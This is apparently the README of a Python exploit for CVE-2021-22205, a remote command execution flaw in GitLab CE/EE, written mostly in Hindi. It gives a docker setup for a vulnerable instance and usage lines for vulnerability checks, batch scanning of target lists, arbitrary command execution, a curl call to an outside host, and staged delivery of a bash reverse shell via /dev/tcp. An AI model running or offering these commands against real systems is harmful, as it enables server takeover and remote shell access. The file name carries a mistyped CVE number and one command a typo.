
# CVE-2021-22205 के लिए Python एक्सप्लॉइट, GitLab CE/EE में एक रिमोट कमांड निष्पादन भेद्यता। एकल-लक्ष्य शोषण, बैच स्कैनिंग और रिवर्स शेल डिलीवरी का समर्थन करता है।
GitLab CE/EE में 11.9 से शुरू होने वाले सभी संस्करणों में एक समस्या खोजी गई है। GitLab फ़ाइल पार्सर को दी गई इमेज फ़ाइलों का सही ढंग से सत्यापन नहीं कर रहा था, जिसके परिणामस्वरूप रिमोट कमांड निष्पादन हुआ।
export GITLAB_HOME=/srv/gitlab
sudo docker run --detach \
--hostname gitlab.example.com \
--publish 443:443 --publish 80:80 \
--name gitlab \
--restart always \
--volume $GITLAB_HOME/config:/etc/gitlab \
--volume $GITLAB_HOME/logs:/var/log/gitlab \
--volume $GITLAB_HOME/data:/var/opt/gitlab \
gitlab/gitlab-ce:13.9.1-ce.0
python3 CVE-2021-2205.py
python3 CVE-2021-2205.py -v true -t http://gitlab.example.com
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "curl http://192.168.59.1:1234/1.txt"
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'Attacked!!!' > /tmp/1.txt"
python3 CVE-2021-2205.py -s true -f target.txt
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'bash -i >& /dev/tcp/ip/port 0>&1' > /tmp/1.sh"
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "chmod +x /tmp/1.sh"
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "/bin/bahs /tmp/1.sh"